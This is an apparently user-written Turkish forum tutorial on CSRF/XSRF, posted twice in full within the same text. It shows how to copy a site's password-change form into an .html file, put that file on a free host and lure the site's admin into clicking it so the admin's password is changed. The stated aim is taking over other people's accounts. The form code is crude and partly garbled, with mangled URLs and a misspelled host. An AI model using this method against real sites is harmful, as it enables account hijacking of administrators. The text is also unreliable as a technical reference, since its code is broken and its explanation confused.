Anlatım Bana Aittir Arkadaşlar
CSRF/XSRF Nedir ?
- 1 Örnek İle Anlatayım ; Ha Black Shadow Ha Shadow Black Olay Bu Ha 2.Olarak Arkadaşalar Karşı Tarafa Dosya Yedirerek
Karşı Taraf Uyurken Sizin Bilgileri Almanız Diyelim Ve Başlayalım.
CSRF/XSRF Açığı Nasıl Bulunur Neler Yapabiliriz
- Site Scriptini Teleport , Httrack gibi programlarla indirip bakarak Biraz Uğraştırır İnsanı
- Hedef Siteyi Toollar yardımcalığı ile taratarak .(Acunetix,Shadow Security scanner ) Ve Birçok Tarayıcı Gibi..
- Manuel Olarak Var Birde
CSRF/XSRF Nasıl Bulunur Ve Kullanılır ?
- Üyelik sistemi olan bir web sitesi düşünün forumlar işde arkadaşlar narkoz.gen.tr mesela bir forum dur öyle düşünelim devam edelim.
Örnek Olarak :
-Sosyal Paylaşım Platformları
-MyBB,VBulletin, Smf gibi... Gibi Site Türleri
Bu Sitelerin Şifre Değiştirme Bölümlerini Böyle Farz Edelim : https://www.blackshadow.com/settings...=password&view şifreyi değiştirebilim
Şifremizi Değiştirdiğimiz Zaman Böyle Bir Tablo Ortaya Çıkarsa : https://www.blackshadow.com/settings...ew=BlackShadow <----->Xsrf/Csrf Açığı Mevcuttur.
XSRF/CSRF Açığı Bulduk Peki Ne Yapabiliriz
https://www.blackshadow.com/settings...ew=BlackShadow <-----> CTRL-u Veya sağ tuş yaparak sayfa kaynağını görüntüleyerek
<form></form>------> Taglarını Bulmak Ve......
<form method="GET" action="settings?tab=account§ion=password&view">
<input type="text" name="Şifre"> ---------------> Kodlarını Bularak Üzerinde Birkaç Değişiklik Yapmak....
<input type="Submit" Name="Submit" Value="Gönder">
</form>
Bu Değişiklikler:
<form method="GET" action="settings?tab=account§ion=password&view"> -----> Olan Yeri Sitenin Tam Adresiye değiştirmek ...
<form method="GET" action="www.blackshadow.com/settings?tab=account§ion=password&view"> ------> Bu Şekilde...
<input type="text" name="olması istediğiniz şifre"> --------> Olmasını İstediğimiz Şifreyi Yazmak
Değiştirdkten Sonraki Görünecek Kod Parçacığı Aynı Bu Şekilde Olması Lazım....
KOD:
1-) Değiştirilen kod parçacığını .html uzantısı olarak kaydedin.
2-).html Uzantılı Dosyanızı Free Hostunuza Atın..
3-)Hedef sitenin admini bu dosyayı tıklatmaya çalışın sm gibi yöntemlerle ..tıkladığı anda hedef sitenin şifresi değişmiş olacaktır.
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
CSRF/XSRF Nedir ?
- 1 Örnek İle Anlatayım ; Ha Black Shadow Ha Shadow Black Olay Bu Ha 2.Olarak Arkadaşalar Karşı Tarafa Dosya Yedirerek
Karşı Taraf Uyurken Sizin Bilgileri Almanız Diyelim Ve Başlayalım.
CSRF/XSRF Açığı Nasıl Bulunur Neler Yapabiliriz
- Site Scriptini Teleport , Httrack gibi programlarla indirip bakarak Biraz Uğraştırır İnsanı
- Hedef Siteyi Toollar yardımcalığı ile taratarak .(Acunetix,Shadow Security scanner ) Ve Birçok Tarayıcı Gibi..
- Manuel Olarak Var Birde
CSRF/XSRF Nasıl Bulunur Ve Kullanılır ?
- Üyelik sistemi olan bir web sitesi düşünün forumlar işde arkadaşlar narkoz.gen.tr mesela bir forum dur öyle düşünelim devam edelim.
Örnek Olarak :
-Sosyal Paylaşım Platformları
-MyBB,VBulletin, Smf gibi... Gibi Site Türleri
Bu Sitelerin Şifre Değiştirme Bölümlerini Böyle Farz Edelim : https://www.blackshadow.com/settings...=password&view şifreyi değiştirebilim
Şifremizi Değiştirdiğimiz Zaman Böyle Bir Tablo Ortaya Çıkarsa : https://www.blackshadow.com/settings...ew=BlackShadow <----->Xsrf/Csrf Açığı Mevcuttur.
XSRF/CSRF Açığı Bulduk Peki Ne Yapabiliriz
https://www.blackshadow.com/settings...ew=BlackShadow <-----> CTRL-u Veya sağ tuş yaparak sayfa kaynağını görüntüleyerek
<form></form>------> Taglarını Bulmak Ve......
<form method="GET" action="settings?tab=account§ion=password&view">
<input type="text" name="Şifre"> ---------------> Kodlarını Bularak Üzerinde Birkaç Değişiklik Yapmak....
<input type="Submit" Name="Submit" Value="Gönder">
</form>
Bu Değişiklikler:
<form method="GET" action="settings?tab=account§ion=password&view"> -----> Olan Yeri Sitenin Tam Adresiye değiştirmek ...
<form method="GET" action="www.blackshadow.com/settings?tab=account§ion=password&view"> ------> Bu Şekilde...
<input type="text" name="olması istediğiniz şifre"> --------> Olmasını İstediğimiz Şifreyi Yazmak
Değiştirdkten Sonraki Görünecek Kod Parçacığı Aynı Bu Şekilde Olması Lazım....
KOD:
Kod:
<form method="GET" action="www.blackshaow.com/settings?tab=account§ion=password&view">
<input type="text" name="olması istediğiniz şifre">
<input type="Submit" Name="Submit" Value="Gönder">
</form>2-).html Uzantılı Dosyanızı Free Hostunuza Atın..
3-)Hedef sitenin admini bu dosyayı tıklatmaya çalışın sm gibi yöntemlerle ..tıkladığı anda hedef sitenin şifresi değişmiş olacaktır.
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur